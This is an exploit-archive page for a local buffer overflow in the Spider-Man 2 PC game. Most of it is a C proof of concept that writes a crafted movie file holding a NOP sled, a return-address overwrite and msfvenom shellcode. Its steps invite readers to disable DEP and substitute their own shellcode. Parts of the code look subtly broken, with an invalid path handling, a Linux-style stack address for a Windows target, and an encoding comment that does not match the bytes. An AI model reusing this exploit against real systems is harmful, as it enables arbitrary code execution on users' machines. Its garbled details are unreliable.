Spiderman2  Game - Buffer Overflow

2020.05.26
tr HexraiN (TR) tr
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Spiderman2  - Buffer Overflow # Exploit Author: HexraiN # Vendor Homepage: https://www.mobygames.com/company/fizz-factor # Software Link: https://www.mobygames.com/game/spider-man-2-the-game # Version: 2.1.1 # Tested on: Windows 10 x64 # Greetz : OA Cybersecurity Labs #Twitter : @smashedkernel # 1 -> Close DEP for Spiderman.exe # 2 -> Change the shellcode with the one you want # 3 -> Change "installation_path" by yourself. # 4 -> Compile & Run PoC # 5 -> Run Game Spiderman.exe # 6 -> Boom #include <stdlib.h> #include <stdio.h> #include <string.h> unsigned char shellcode[] = # msfvenom -p windows/exec CMD=notepad -e x64/alpha_mixed -f c  -v // SIZE = 192 Bytes "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" "\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f" "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5" "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" "\x00\x53\xff\xd5\x6e\x6f\x74\x65\x70\x61\x64\x00"; void main(void) {      unsigned char *installation_path[] = "C:\\Program Files(x86)\\Activision\\Spider-Man 2";      strcpy(installation_path,"\\Movies\\ACTIVISN.bik"); char buffer[421]; FILE *vulnerable;      memset(&buffer, 0x90, 421);     long addr = 0xbffff240 + 0xc0;    // address to insert into eip == address of local buffer in bof + ~192 bytes into nops     memcpy(buffer + 28, &addr, sizeof(long)); // buffer offset at 28 = location of rip register     memcpy(buffer + sizeof(buffer) - sizeof(shellcode) - 1, shellcode, sizeof(shellcode));     vulnerable = fopen(installation_path, "w");     fwrite(buffer, 421, 1, vulnerable);     fclose(vulnerable); }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top